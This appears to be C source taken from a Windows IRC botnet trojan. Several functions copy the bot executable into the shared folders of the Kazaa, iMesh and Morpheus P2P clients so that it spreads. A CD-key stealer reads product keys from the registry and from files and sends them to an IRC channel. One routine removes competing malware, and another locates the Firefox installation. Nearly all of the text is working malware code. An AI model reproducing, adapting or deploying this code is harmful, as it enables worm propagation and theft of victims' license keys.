char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/) { HKEY key=NULL; DWORD dwRes=65535; static char szRegBuffer[65535+2]; ZeroMemory(szRegBuffer,65535); if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS) { if(fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes) == ERROR_SUCCESS) { if (type==REG_MULTI_SZ) { szRegBuffer[dwRes] = '\0'; // Ensure termination // Skip back through ALL the null chars first while (szRegBuffer[dwRes]=='\0' && dwRes != 0) --dwRes; for (unsigned int i=0; i<dwRes; ++i) { if (szRegBuffer[i]=='\0') szRegBuffer[i]='\n'; // Convert to \n } } fRegCloseKey(key); return szRegBuffer; } fRegCloseKey(key); } return '\0'; }
void removevirus() { char sysdir[MAX_PATH], virusexecuteble[MAX_PATH]; unsigned char szDataBuf[128]; HKEY hkey; LONG lRet; DWORD dwSize = 128; for (unsigned int i=0; viruses[i].subkey; i++) { lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { fRegDeleteValue(hkey, viruses[i].value); //FIXME: Replace the afw kill utils. we dont need to let that loop, // when we removed the .exe and the reg key. mayb a static call // to KillProcess(); can be inserted here. Something like: // KillProcess(viruses[i].file); GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecuteble); } fRegCloseKey(hkey); } return; }
void iMeshInit(char *botfile) { char buffer[MAX_PATH]; HKEY hkey = NULL; DWORD dwSize = 128; fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) { CopyFile(botfile, buffer, FALSE); } fRegCloseKey(hkey); return; }
void KazaaInit(char *botfile) { char buffer[MAX_PATH]; HKEY hkey; DWORD dwSize = 128; fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) { replacestr(buffer, "012345:", ""); CopyFile(botfile, buffer, FALSE); } fRegCloseKey(hkey); return; }
void MorpheusInit(char *botfile) { char buffer[MAX_PATH]; HKEY hkey; DWORD dwSize = 128; fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) { _snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer); CreateDirectory(buffer, 0); CopyFile(botfile, buffer, FALSE); } fRegCloseKey(hkey); return; }
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success) { HKEY key=NULL; DWORD dwType=REG_DWORD,dwSize=sizeof(DWORD),dwRead=0; if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS) { if(fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize)==ERROR_SUCCESS) { fRegCloseKey(key); success=TRUE; return dwRead; } fRegCloseKey(key); } success=FALSE; return 0; }
void getcdkeys(SOCKET sock, char *chan, BOOL notice) { char sendbuf[IRCLINE], line[100], szPath[MAX_PATH]; unsigned char szDataBuf[128]; FILE *fp; HKEY hkey; LONG lRet; DWORD dwSize = 128; for (unsigned int i=0; regkeys[i].subkey; i++) { lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { if (regkeys[i].file) { sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file); if((fp=fopen(szPath,"r"))!=NULL) { while(fgets(line,sizeof(line),fp)) { if(!strstr(line, regkeys[i].tag)) { if (strchr(regkeys[i].tag,'=')) { strtok(line,"="); sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "=")); } else sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line); irc_privmsg(sock,chan,sendbuf,notice); addlog(sendbuf); break; } } fclose(fp); } } else { sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf); irc_privmsg(sock,chan,sendbuf,notice); addlog(sendbuf); } } fRegCloseKey(hkey); } return; }
void removevirus() { char sysdir[MAX_PATH], virusexecuteble[MAX_PATH]; unsigned char szDataBuf[128]; SOCKET sock; HKEY hkey; char sendbuf[IRCLINE]; char current[20]; LONG lRet; sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP); DWORD dwSize = 128; for (unsigned int i=0; viruses[i].subkey; i++) { lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { fRegDeleteValue(hkey, viruses[i].value); strcpy(current,viruses[i].file); //FIXME: Replace the afw kill utils. we dont need to let that loop, // when we removed the .exe and the reg key. mayb a static call // to KillProcess(); can be inserted here. Something like: if(listProcesses(sock,NULL,FALSE,current) == 1) sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file); else sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file); //KillProcess(viruses[i].file); GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecuteble); } fRegCloseKey(hkey); } sprintf(sendbuf,"[AV]: Antivirus search complete! "); return; }
char *GetFirefoxLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *firefoxPath = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { //DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry "); fRegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { //DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty"); fRegCloseKey(rkey); return NULL; } fRegCloseKey(rkey); // This path may contain extra double quote.... if( path[0] == '\"' ) { for(unsigned int i=0; i< strlen(path)-1 ; i++) path[i] = path[i+1]; } //DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } firefoxPath = (char*) malloc( strlen(path) + 1); if( firefoxPath ) strcpy(firefoxPath, path); //DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath); return firefoxPath; }